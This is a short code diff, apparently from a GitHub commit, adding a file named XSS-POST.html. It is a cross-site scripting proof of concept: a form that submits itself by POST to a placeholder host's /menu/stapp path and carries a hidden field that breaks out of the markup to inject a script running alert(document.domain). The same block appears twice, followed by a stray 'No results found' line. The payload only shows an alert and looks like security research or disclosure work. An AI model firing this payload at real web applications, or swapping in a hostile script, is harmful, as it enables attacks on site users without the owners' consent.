bing0o · February 16, 2021 10:29
diff --git a/XSS-POST.html b/XSS-POST.html
 <form name=TheForm action=https://HOSTNAME/menu/stapp method=post>
 <input type=hidden name=foo value='appname=%0a"</input><script>alert(document.domain)</script>'>
 </form>
 <script>
 document.TheForm.submit();
 </script>
	<form name=TheForm action=https://HOSTNAME/menu/stapp method=post>
	<input type=hidden name=foo value='appname=%0a"</input><script>alert(document.domain)</script>'>
	</form>
	<script>
	document.TheForm.submit();
	</script>
No results found